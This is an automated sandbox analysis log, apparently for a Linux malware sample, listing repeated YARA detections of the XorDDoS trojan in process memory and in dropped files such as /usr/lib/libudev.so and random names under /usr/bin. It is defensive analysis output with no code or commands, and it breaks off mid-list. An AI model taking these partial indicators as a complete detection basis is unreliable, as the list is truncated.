        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6423, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6426, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6429, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6435, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6438, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6440, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6443, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6445, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6452, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6454, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6457, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6461, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6463, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6469, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6472, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6474, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6477, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6480, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6486, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6491, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6493, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6496, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6499, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: HaJTqGiPpD PID: 6506, type: MEMORYSTR
        Source: Yara matchFile source: /usr/bin/ibkljkndlm, type: DROPPED
        Source: Yara matchFile source: /usr/lib/libudev.so, type: DROPPED
        Source: Yara matchFile source: /usr/bin/qrabekbstr, type: DROPPED
        Source: Yara matchFile source: /usr/bin/kigdktzeum, type: DROPPED
        Source: Yara matchFile source: /usr/bin/eqznayducj, type: DROPPED
        Source: Yara matchFile source: /usr/bin/wvbxepjyjx, type: DROPPED
        Source: Yara matchFile source: /usr/bin/sxruomujjd, type: DROPPED
        Source: Yara matchFile source: /usr/bin/buxftyvhwp, type: DROPPED
        Source: Yara matchFile source: /usr/bin/iulapzbfpq, type: DROPPED
        Source: Yara matchFile source: /usr/bin/gnmftoxpza, type: DROPPED
        Source: Yara matchFile source: /usr/bin/posifzmmhg, type: DROPPED
        Source: Yara matchFile source: /usr/bin/sotpizdssr, type: DROPPED
        Source: Yara matchFile source: /usr/bin/becqudbgme, type: DROPPED
        Source: Yara matchFile source: /usr/bin/mizdkrdyqj, type: DROPPED

        System Summary

        barindex
        Source: HaJTqGiPpD, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: HaJTqGiPpD, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: HaJTqGiPpD, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: HaJTqGiPpD, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: HaJTqGiPpD, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: HaJTqGiPpD, type: SAMPLEMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
        Source: HaJTqGiPpD, type: SAMPLEMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
